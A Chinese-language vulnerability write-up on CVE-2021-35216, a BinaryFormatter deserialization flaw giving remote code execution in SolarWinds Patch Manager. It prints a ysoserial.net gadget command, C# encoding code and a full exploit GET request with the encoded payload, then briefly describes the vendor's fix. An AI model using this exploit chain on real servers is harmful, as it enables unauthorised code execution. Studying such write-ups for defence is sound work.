1 min read

CVE-2021-35216 SolarWinds PM EditTopXX.aspx RCE

分析

同样是使用了Serializer.Deserialize<T>(string serializedObject)

漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs

1.png

同样调用 binaryformatter

2.png

ysoserial.net生成payload可以直接打,需要注意只能用get请求发包,所以要用最小的payload。

ysoserial.exe -f binaryformatter -g  RolePrincipal --minify -c "ping localhost -t"

然后编码

using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web;
using System.Web.Mvc;

namespace WebApplication1.Controllers
{
    public class HomeController : Controller
    {
        public ActionResult Index()
        {
            var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
                "AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAANgFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUNIQXp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QndhVzVuSUd4dlkyRnNhRzl6ZENBdGRDSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL"));
            Response.Write(payload);
            return View();
        }
    }

    public class Serializer
    {
        // Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
        public static string Serialize(object parameters)
        {
            string result;
            using (MemoryStream memoryStream = new MemoryStream())
            {
                new BinaryFormatter().Serialize(memoryStream, parameters);
                result = Base64Helper.Base64Encode(memoryStream.ToArray());
            }

            return result;
        }

        // Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
        public static T Deserialize<T>(string serializedObject)
        {
            T result;
            using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
            {
                result = (T) ((object) new BinaryFormatter().Deserialize(stream));
            }

            return result;
        }
    }

    internal class Base64Helper
    {
        // Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
        public static string Base64Encode(byte[] str)
        {
            return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
        }

        // Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
        public static byte[] Base64Decode(string str)
        {
            byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
            return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
        }
    }
}

构造请求如下

http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1

RCE

3.png

问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。

修复

4.png

改用DataContractSerializer处理序列化,并限定KnowsType。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。